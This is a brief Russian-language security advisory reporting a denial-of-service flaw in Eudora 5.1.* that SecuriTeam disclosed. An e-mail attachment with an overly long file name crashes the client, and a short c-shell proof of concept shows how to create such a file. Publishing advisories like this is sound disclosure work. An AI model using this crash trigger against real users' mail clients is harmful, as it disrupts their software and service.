Уязвимость отказа в обслуживании обнаружена в почтовом клиенте Eudora. Удаленный пользователь может послать почтовое сообщение, которое приведет к аварийному завершению работы клиента. 

SecuriTeam сообщил, что удаленный пользователь может послать e-mail сообщение с файлом, который имеет длинное имя, целевому пользователю, чтобы аварийно завершить работу программы. Пример: 

Create a text file with a long name using:
$ set a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
and
$ echo «security» >! $a.txt
(Written in c-shell)

Уязвимость обнаружена в Eudora Versions 5.1.*.



Оставить мнение